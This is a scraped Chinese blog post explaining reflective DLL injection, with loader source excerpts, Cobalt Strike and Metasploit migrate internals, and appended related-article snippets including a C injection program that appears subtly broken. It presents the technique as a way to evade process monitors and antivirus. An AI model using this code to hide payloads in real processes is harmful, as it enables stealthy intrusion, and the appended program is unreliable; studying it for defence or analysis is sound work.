【ReflectDllInjection】 反射型DLL注入

已于 2022-04-22 16:23:37 修改
阅读量3.2k 收藏 15
点赞数 3
文章标签: windows
于 2022-04-06 23:03:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x1183834753/article/details/124002525
版权

常规dll注入

这里引用一张图来表示:
在这里插入图片描述

反射型DLL注入思路:

  1. 读入原始DLL文件至内存缓冲区
  2. 解析DLL标头并获取SizeOfImage
  3. 将DLL标头和PE节复制到步骤3中分配的内存空间
  4. 执行重定位
  5. 加载DLL导入的库
  6. 解析导入地址表(IAT)
  7. 调用DLL的DLL_PROCESS_ATTACH

反射型dll注入与其他dll注入不同的是,其不需要使用LoadLibrary这一函数,而是自己来实现整个装载过程。我们可以为待注入的DLL添加一个导出函数,ReflectiveLoader,这个函数的功能就是装载它自身。
由于是自己实现,因此不会利用系统自身Loadlibrary,不会“注册”到系统,不会被系统记录。也不会被ProcessExplorerer发现。

要实现反射型DLL注入需要两个部分,注射器和被注入的DLL。

注射器的执行流程:

  1. 将待注入DLL读入自身内存(避免落地)
  2. 利用VirtualAlloc和WriteProcessMemory在目标进程中写入待注入的DLL文件
  3. 利用CreateRemoteThread等函数启动位于目标进程中的ReflectLoader

而ReflectiveLoader的实现:
就是对自身的装载。

反射型dll注入与常规注入有何不同:

  1. 直接在内存中展开,无需.dll 文件存在。
  2. 没有通过Load Library等API加载,ProcessExplorer、procexp64 等工具无法检测到这个dll
  3. 更容易免杀。

反射dll注入思路:

1.根据需要注入的进程,向服务器申请dll下发;
2.将下发的数据解密后,直接写入申请的堆中;
3.打开进程(OpenProcess)、分配内存(VirtualAllocEx)、将堆中的数据写入内存4.(WriteProcessMemory);
4.获取 RtlCreateUserThread 函数指针
.RtlCreateUserThread = (PRTL_CREATE_USER_THREAD)(GetProcAddress(GetModuleHandle(TEXT(“ntdll”)), “RtlCreateUserThread”));
5.通过 RtlCreateUserThread 创建线程,调用 目标进程 内存中的 ReflectiveLoader;
ReflectiveLoader 将dll在内存中展开,修复重定位、导入表(类似ShellCode);
6.ReflectiveLoader 调用dll入口点

核心思路

在CS的dll中所有的dll都有自加载能力,所有beacon的扩展功能几乎都是这样实现的。CS将其称为“可修补的dll”,它的原理是不改变MZ的情况下把整个dll文件修补成可被当作shellcode加载的格式,具体的操作是将dll内导出自加载函数,然后将MZ头起始字节修改为可执行ReflectiveLoader函数的硬编码。

dll自加载原理

因为PE文件包含了很多区段,为了节省空间,这些区段在磁盘上存储时候比较紧凑,如果把它们原样放入内存中运行是一定是会出问题的。所以RelectieDllLoader的一个任务就是按照规则将这些区段按照规则映射到对应的虚拟地址中去。
另外我们的dll也会用到其他的dll,这时需要把我们的dll所依赖的dll也装入内存。并修复导入表。

  • 首先使用_ReturnAddress()函数获取当前函数的返回地址,因为调用这个函数是在Reflectiveloader的内部,因此从这个地址向上便利,找到0x4d, 0x5a就可以定位到PE文件头所在的婿你地址
  • 通过FS:[0x30]获取到PEB,用PEB遍历出进程所需要的所有模块dll的基地址(LDR),之后通过解析 dll PE文件的导出表获取导出函数偏移地址,如: LoadLibrary GetProcAddress VirtualAlloc 等函数的虚拟地址。
  • 在调用ReflectiveLoader前,注入器程序会在目标进程申请一块内存空间,但是那是存放的是dll的在磁盘上的结构,要将dll映射到内存中并重新进行内存分配。在 IMAGE_OPTIONAL_HEADER -> SizeOfImage记录这个dll装入内存时候的占用的大小,用这个值作为VirtualAlloc的参数。
  • 将dll的PE文件头和各个节复制到对应的位置上。
  • 被注入的DLL可能还依赖于其他DLL,因此我们还需要使用LoadLibrary加载这些dll(LoadLibrary地址在上面已拿到)
  • 被注入的DLL只有Reflectiveloader中的代码是被写成地址无关的,不需要重定位,其他部分的代码则需要重定位才能正确运行。对于重定位问题,PE的可选头中DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]指向重定位表:关于重定位在PE文件结构中有介绍。
  • 然后就是DLL重定位。

总结:

  1. 获得被注入进程未解析的dll的基地址
  2. 获取必要的dll句柄和函数为修复导入表做准备。
  3. 分配一块新内存解析dll,并将pe头伏知道新内存汇总和将各节复制到新内存。
  4. 修复导入表和重定向表。
  5. 执行dllmain函数

CS 反射dll原理

现今仍在使用的DOS结构只有PE文件的MZ标志和PE头的e_lfanew,其他随意修改不会影响这个PE文件的正常运行。
引用一张图如下:
在这里插入图片描述

msf的migrate 原理:

migrate 和 ReflectiveDllInjection项目大致相同。原理如下:

  • 读取metsrv.dll(metpreter payload模板dll)文件到内存中。
  • 生成最终的payload。
    a) msf生成一小段汇编migrate stub主要用于建立socket连接。
    b) 将metsrv.dll的dos头修改为一小段汇编meterpreter_loader主要用于调用reflective loader函数和dllmain函数。在metsrv.dll的config block区填充meterpreter建立session时的配置信息。
    c) 最后将migrate stub和修改后的metsrv.dll拼接在一起生成最终的payload。
  • 向msf server发送migrate请求和payload。
  • msf向迁移目标进程分配一块内存并写入payload。
  • msf首先会创建的远程线程执行migrate stub,如果失败了,就会尝试用apc注入的方式执行migrate stub。migrate stub会调用meterpreter loader,meterpreter loader才会调用reflective loader。
  • reflective loader进行反射式dll注入。
  • 最后msf client和msf server建立一个新的session。

在这里插入图片描述

原理

ReflectiveLoader()首先会调用caller()函数。

uiLibraryAddress = caller();

caller()函数实质上是_ReturnAddress()函数封装。calller()函数的作用是获取ReflectiveLoader()函数中调用caller()函数的下一条指令地址。

#ifdef __MINGW32__
#define WIN_GET_CALLER() __builtin_extract_return_addr(__builtin_return_address(0))
#else
#pragma intrinsic(_ReturnAddress)
#define WIN_GET_CALLER() _ReturnAddress()
#endif
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)WIN_GET_CALLER(); }

然后向低地址(向上,回退搜索)逐字节比较石头为dos头的标志ME字串。如果当前地址的内容为MZ字符串,则把当前地址认为是dos头结构体的开头,并校验dos头e_leanew结构是否指向pe头的标识“PE”字符串。若校验通过,则认为当前地址是正确的DOS头结构体的开头。

while( TRUE )
{
    //将当前地址当成dos头结构,此结构的e_magic成员变量是否指向MZ子串
    if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) 
    {
        uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
        if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
        {
            uiHeaderValue += uiLibraryAddress;
            //判断e_lfanew结构成员是否指向PE子串,是则跳出循环,取得未解析dll的基地址
            if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
                break;
        }
    }
    uiLibraryAddress--;
}
获取必要的dll句柄和函数地址:

获取必要的dll句柄是通过遍历peb结构体中的ldr成员中的InMemoryOrderList链表获取dll名称,之后算出dll名称hash,最后进行hash对比得到最后dll名。

uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
    uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
    usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
    uiValueC = 0;
    ULONG_PTR tmpValC = uiValueC;
    //计算tmpValC所指向子串的hash值,并存储在uiValueC中
    ....
    if( (DWORD)uiValueC == KERNEL32DLL_HASH )

必要的函数是遍历函数所在dll导出表获得函数名称,然后进行hash对比得到的:

uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
while( usCounter > 0 )
        {
        dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
            if( dwHashValue == LOADLIBRARYA_HASH
            //等于其他函数hash的情况
            || ...
            )
            {
                uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
                uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
                if( dwHashValue == LOADLIBRARYA_HASH )
                    pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
                //等于其他函数hash的情况
                ...
                usCounter--;
            }
            uiNameArray += sizeof(DWORD);
            uiNameOrdinals += sizeof(WORD);
        }
}
将dll映射到新内存:

Nt optional header结构体中的SizeOfImage 变量存储着PE文件在内存中解析后所占内存的大小。所以ReflectiveLoader获取到SizeOfImage的大小,分配一块新内存,然后按照section header结构中的文件相对偏移和相对虚拟地址,将PE节一一映射到新内存中。

//分配SizeOfImage的新内存
uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
...
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
//将所有头和节表逐字节复制到新内存
while( uiValueA-- )
    *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
//解析每一个节表项
uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
while( uiValueE-- )
{
    uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
    uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
    uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
    //将每一节的内容复制到新内存对应的位置
    while( uiValueD-- )
        *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
    uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
#### 修复导入表和重定位表:
首先根据导入表结构,找到导入函数所在的dll名称,然后使用loadlibrary()函数载入dll,根据函数序号或函数名称,在载入的dll的导出表中,通过hash对比,把找出的函数地址写入到新内存的ITA表中。

uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
//当没有到达导入表末尾时
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
{
    //使用LoadLibraryA()函数加载对应的dll
    uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
    ...
    uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
    //IAT表
    uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
    while( DEREF(uiValueA) )
    {
        //如果导入函数是通过函数编号导入
        if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
        {    //通过函数编号索引导入函数所在dll的导出函数    
            uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
            uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
            uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
            uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
            uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
            //将对应的导入函数地址写入IAT表
            DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
        }
        else
        {
            //导入函数通过名称导入的
            uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
            DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
        }
        uiValueA += sizeof( ULONG_PTR );
        if( uiValueD )
            uiValueD += sizeof( ULONG_PTR );
    }
    uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}

然后是进行重定位:

uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
//如果重定向表的值不为0,则修正重定向节
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
    uiValueE = ((PIMAGE_BASE_RELOCATION)uiValueB)->SizeOfBlock;
    uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
    while( uiValueE && ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
    {
        uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
        uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
        uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
        //根据不同的标识,修正每一项对应地址的值
        while( uiValueB-- )
        {
            if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
                *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
            else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
                *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
            else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
                *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
            else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
                *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
            uiValueD += sizeof( IMAGE_RELOC );
        }
        uiValueE -= ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
        uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
    }
}

总结:

反射型dll注入的 Reflectiveloader 可以理解为实质上是自己实现了一遍windows dll loader。

欢迎各位大佬一起来免费知识星球学习: 一起探究安全原理,探索更多攻击方法。
https://t.zsxq.com/2rjA6yn

dr0op
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
深入理解反射dll注入技术
m0_67698950的博客
06-22 1341
前言dll 注入技术是让某个进程主动加载指定的 dll 的技术。恶意软件为了提高隐蔽性,通常会使用 dll 注入技术将自身的恶意代码以 dll 的形式注入高可信进程。常规的 dll 注入技术使用 LoadLibraryA() 函数来使被注入进程加载指定的 dll。常规dll注入的方式一个致命的缺陷是需要恶意的 dll 以文件的形式存储在受害者主机上。这样使得常规 dll 注入技术在受害者主机上留下痕迹较大,很容易被 edr 等安全产品检测到。为了弥补这个缺陷,stephen fewer 提出了反射dll
reflective dll injection 反射注入
hambaga的博客
02-20 1479
一、reflective dll injection 反射注入介绍 网上对反射注入的定义是只通过内存把DLL注入到特定进程中,也就是说整个过程都不涉及文件操作。 优点 规避杀软基于文件系统的检测 不会在进程的DLL链表里留下记录 通过特殊处理,可以使用正常的方式编写DLL,实现shellcode的效果 缺点 DLL体积较大,相比于shellcode注入,更容易被检测 二、修改dos头,填入精心构造的 bootstrap shellcode metasploit 实现的bootstrap
C/C++ DLL反射注入内存手动映射
CSDN
07-16 8302
首先计算得到基地址的偏移量,也就是实际的 DLL 加载地址减去 DLL 的推荐加载地址(保存在 NT可选头的 ImageBase 中,实际 DLL 加载地址是我们调用 VirtualAlloc()的返回值。首先使用 _ReturnAddress() 获取当前函数的返回地址,因为调用这个函数是在 ReflectiveLoader 的内部,因此从这个地址向上遍历,找 0x4d ,0x5a 就可以定位到 DLL 的 PE 文件头所在的虚拟地址 (o゚v゚)ノ。将 DLL 的 PE文件头和各个节复制到对应的位置。
反射dll注入
摔不死的笨鸟的博客
08-27 6454
前不久实现了经典dll注入exe,实现注入到用户层面进程,比如notepad.exe和wps.exe。(像金山毒霸kxetray.exe有自我保护机制也注入不进去)。由于对会话隔离注入不太了解,怕搞坏主机,没有再去实现注入到系统进程中。最近在网上看到dll反射注入,想把学习总结的笔记给大家分享一下。 首先什么是反射注入?它和传统经典注入有什么区别呢?我这里作个比喻。 经典式: 在别人的内存里调用...
探索高效的技术注入:Reflective DLL Injection
gitblog_00086的博客
05-09 433
探索高效的技术注入:Reflective DLL Injection 项目地址:https://gitcode.com/stephenfewer/ReflectiveDLLInjection 在信息安全和软件调试领域,库的动态加载与注入是一项关键技能。今天,我们有幸向您介绍一个独特且强大的开源项目——Reflective DLL Injection。这个项目利用反射编程技术,实现了将库文件从内存中...
WEB安全:深入反射dll注入技术
2301_76694151的博客
05-16 912
通过调用CreateRemoteThread()/NtCreateThread()/RtlCreateUserThread()函数在被注入进程创建线程进行dll注入。通过调用QueueUserAPC()/SetThreadContext()函数来劫持被注入进程已存在的线程加载dll。通过调用SetWindowsHookEx()函数来设置拦截事件,在发生对应的事件时,被注入进程执行拦截事件函数加载dll。获取被注入进程PID。在注入进程的访问令牌中开启SE_DEBUG_NAME权限。
反射dll注入(ReflectiveDLLInjection)
随心动,随风行
04-30 3828
学习基于stephenfewer大佬的项目:ReflectiveDLLInjection 有兴趣的同学可以下载研究
多种DLL注入技术原理介绍
热门推荐
顺其自然~专栏
11-06 3万+
本文中我将介绍DLL注入的相关知识。不算太糟的是,DLL注入技术可以被正常软件用来添加/扩展其他程序,调试或逆向工程的功能性;该技术也常被恶意软件以多种方式利用。这意味着从安全角度来说,了解DLL注入的工作原理是十分必要的。 不久前在为攻击方测试(目的是为了模拟不同类的攻击行为)开发定制工具的时候,我编写了这个名为“injectAllTheThings”的小工程的大...
DLL注入
weixin_51313054的博客
10-20 6653
DLL注入DLL注入原理dll注入实现过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 DLL注入原理 在Windows操作系统中,运行的每一个进程都生活在自己的程序空间中(保护模式),每一个进程都认为自己拥有整个机器的控制权,
dll注入实例注入代码
11-03
DLL注入是一种技术,它允许一个进程(通常是恶意软件或黑客工具)将动态链接库(DLL)加载到另一个正在...通过研究提供的代码实例,你可以逐步掌握这个过程,并进一步探索相关的高级技巧,如反射注入、远程函数调用等。
Doge-sRDI:Golang的反射DLL注入的Shellcode实现。 将DLL转换为与位置无关的Shellcode
04-01
Golang的反射DLL注入的Shellcode实现。 将DLL转换为与位置无关的Shellcode 非常感谢Sliver项目和leoloobeek 用法 srdi.exe [dllName] [Args(不必要)] [entryPoint(不必要)] PS D:\> .\srdi.exe .\Outflank-...
Windows 反射注入DLL
12-13
Windows反射注入DLL是一种高级的系统编程技术,主要用于在运行时将动态链接库(DLL)加载到目标进程的地址空间中。这种方法不依赖于传统的API函数,如`LoadLibrary()`或`GetProcAddress()`,而是利用了DLL自身来...
windows-DLL注入
08-14
- **Reflective DLL Injection**:反射DLL注入DLL自身负责加载到目标进程,无需外部辅助工具。 - **Service Injection**:通过服务控制来实现DLL注入。 - **Driver-Based Injection**:利用驱动程序在内核层进行...
Phage:反射DLL注入式过程感染器
04-29
Phage是一种特殊的恶意软件技术,它采用了反射DLL注入(Reflective DLL Injection)的方法来感染其他进程,但与传统的DLL注入不同,它不直接注入动态链接库(DLL),而是将可执行文件自身注入目标进程中。...
C&C++:贪吃蛇小游戏教程
最新发布
2301_79728896的博客
08-02 1859
贪吃蛇是一款经典的小游戏,通过控制蛇头方向吃食物,使得蛇🐍变长,从而获得积分,通过上下左右键控制蛇的移动方向,寻找吃的东西,每吃到一口就能得到一定的积分,而且蛇的身子会越来越长,难度也越来越大,不能碰墙,也不能咬到自己的身体和尾巴,否则游戏结束,总体来说这款小游戏既简单又耐玩,至今仍是一款风靡全球的小游戏,也是编程入门学习的热门小游戏,今天将带领大家实现这款小游戏。
【中科院1区】Matlab实现天鹰优化算法AO-RF锂电池健康状态估计算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
汽车行业数字化转报告顶层规划设计.docx
08-02
汽车行业数字化转报告顶层规划设计.docx
毕业设计,基于ASP.NET+SqlServer开发的企业投资价值分析系统,内含完整源代码,数据库,毕业论文
08-02
毕业设计,基于ASP.NET+SqlServer开发的企业投资价值分析系统,内含完整源代码,数据库,毕业论文 自中国证券市场产生以来,投资者进行投资理财迫切需要有一个科学的理论依据,在众多投资理论体系中,确定企业的价值和股票的价值,是一个重要的流派。著名的投资专家巴非特就是通过分析企业的内在价值,寻找价值被低估的股票,等到市场认可了该企业的价值,再将股票抛出,从而获得了的投机收益,其管理的基金也一度成为世界上最成功的投资基金之一。从西方国家理论界对相关领域的研究结果来看,也取得了一些成果,包括:CAPM 模、 ICAPM模、APT模等,也有人用市盈率方法对股票进行定价。国内在相关的领域也取得了一些研究成果。然而,尽管国内外理论界研究成果较多,但真正适应中国证券市场、适应中国广大投资者的切实有效的理论至今仍是一个空白。在中国这样一个特殊的背景下,股权结构的特殊性、证券市场初创时期的投资性等因素,使得一些模受到挑战,而且这些模的精确化程度也受到限制,有必要探求新的思路和方法,为广大的投资者提供切实可靠的操作依据。对股票的价值进行评估必须综合尽可能全面的因素才能使得这些评估更加科
使用c语言编写一个反射dll 注入的程序,并附带一个dll的模板
07-09
当涉及到 DLL 注入反射注入方法时可以使用 C 语言编写一个程序来实现。下是一个示例程序,它演示了如何使用反射注入DLL 注入到目标进程中: ```c #include <stdio.h> #include <windows.h> // 反射注入 DLL 的函数 BOOL ReflectiveDllInjection(LPVOID lpDllBuffer) { // 获取当前进程的基址 HMODULE hModule = GetModuleHandle(NULL); // 获取当前进程的 DOS 头 PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; // 获取当前进程的 NT 头 PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hModule + pDosHeader->e_lfanew); // 获取当前进程的映像基址 LPVOID pImageBase = (LPVOID)pNtHeaders->OptionalHeader.ImageBase; // 获取当前进程的入口点函数地址 LPVOID pEntryPoint = (LPVOID)((DWORD_PTR)pImageBase + pNtHeaders->OptionalHeader.AddressOfEntryPoint); // 为反射注入分配内存 LPVOID pRemoteImageBase = VirtualAllocEx(GetCurrentProcess(), NULL, pNtHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 将当前进程的映像基址复制到目标进程中 WriteProcessMemory(GetCurrentProcess(), pRemoteImageBase, pImageBase, pNtHeaders->OptionalHeader.SizeOfImage, NULL); // 将 DLL 缓冲区写入到目标进程中 WriteProcessMemory(GetCurrentProcess(), (LPVOID)((DWORD_PTR)pRemoteImageBase + ((PIMAGE_NT_HEADERS)lpDllBuffer)->OptionalHeader.ImageBase), lpDllBuffer, ((PIMAGE_NT_HEADERS)lpDllBuffer)->OptionalHeader.SizeOfImage, NULL); // 更新目标进程的导入表 PIMAGE_IMPORT_DESCRIPTOR pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD_PTR)pRemoteImageBase + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); while (pImportDesc->Name != 0) { HMODULE hDll = LoadLibraryA((LPCSTR)((DWORD_PTR)pRemoteImageBase + pImportDesc->Name)); PIMAGE_THUNK_DATA pThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)pRemoteImageBase + pImportDesc->FirstThunk); while (pThunk->u1.Function != 0) { DWORD_PTR pFunc = (DWORD_PTR)GetProcAddress(hDll, (LPCSTR)pThunk->u1.Function); WriteProcessMemory(GetCurrentProcess(), &pThunk->u1.Function, &pFunc, sizeof(DWORD_PTR), NULL); pThunk++; } pImportDesc++; } // 创建远程线程来运行目标进程的入口点函数 HANDLE hThread = CreateRemoteThread(GetCurrentProcess(), NULL, 0, (LPTHREAD_START_ROUTINE)pEntryPoint, pRemoteImageBase, 0, NULL); if (hThread == NULL) { return FALSE; } WaitForSingleObject(hThread, INFINITE); // 清理内存 VirtualFreeEx(GetCurrentProcess(), pRemoteImageBase, 0, MEM_RELEASE); return TRUE; } int main() { // 读取 DLL 文件 FILE* fp = fopen("dll_template.dll", "rb"); if (fp == NULL) { printf("无法打开 DLL 文件!\n"); return 1; } // 获取 DLL 文件的大小 fseek(fp, 0, SEEK_END); long fileSize = ftell(fp); fseek(fp, 0, SEEK_SET); // 分配内存来存储 DLL 文件数据 LPVOID lpDllBuffer = malloc(fileSize); // 读取 DLL 文件数据到内存中 fread(lpDllBuffer, fileSize, 1, fp); // 关闭文件 fclose(fp); // 执行反射注入 if (ReflectiveDllInjection(lpDllBuffer)) { printf("DLL 注入成功!\n"); } else { printf("DLL 注入失败!\n"); } // 释放内存 free(lpDllBuffer); return 0; } ``` 上述示例程序中,你需要将要注入DLL 文件命名为 "dll_template.dll",并与程序放在同一目录下。然后编译并运行程序,它将尝试将该 DLL 注入到目标进程中。 请注意,反射注入的程序需要具有管理员权限才能成功运行。此外,反射注入可能会受到一些安全软件的检测,因为它使用了一些与恶意软件类似的技术。 希望这个示例程序能帮助到你!如有任何问题,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值